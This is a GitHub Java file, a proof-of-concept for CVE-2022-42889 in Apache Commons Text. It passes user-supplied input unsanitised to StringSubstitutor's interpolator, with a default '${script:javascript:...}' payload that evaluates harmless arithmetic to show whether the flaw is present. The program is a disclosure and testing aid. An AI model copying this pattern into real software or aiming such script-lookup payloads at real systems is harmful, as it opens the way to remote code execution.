CVE-2022-42889/src/main/java/com/example/demo/DemoApplication.java at master · neerazz/CVE-2022-42889 · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
package com.example.demo;

import org.apache.commons.text.StringSubstitutor;

import java.util.Scanner;

public class DemoApplication {

    public static void main(String[] args) {

        final String DEFAULT_POC_STRING = "${script:javascript:195 + 324}";
        StringSubstitutor stringSubstitutor = StringSubstitutor.createInterpolator();

        String fmt = "===============================================================================================================================================================================================";
        System.out.println(fmt);
        System.out.println("Enter your exploit string (press Enter to use the default of '${script:javascript:195 + 324}'): ");
        Scanner in = new Scanner(System.in);

        String exploitString = in.nextLine();

        if (exploitString == null || exploitString.length() == 0) {
            exploitString = DEFAULT_POC_STRING;
        }
        String output = stringSubstitutor.replace(exploitString);
        System.out.println(fmt);
        System.out.printf("Exploiting PoC with the exploit string '%s'%n", exploitString);
        System.out.println(fmt);
        System.out.println("PoC Output:");
        System.out.println(output);
        System.out.println(fmt);
        System.out.printf("If your output for the default input is %d, then your app is exploitable.%n", 519);
        System.out.println(fmt);
    }
}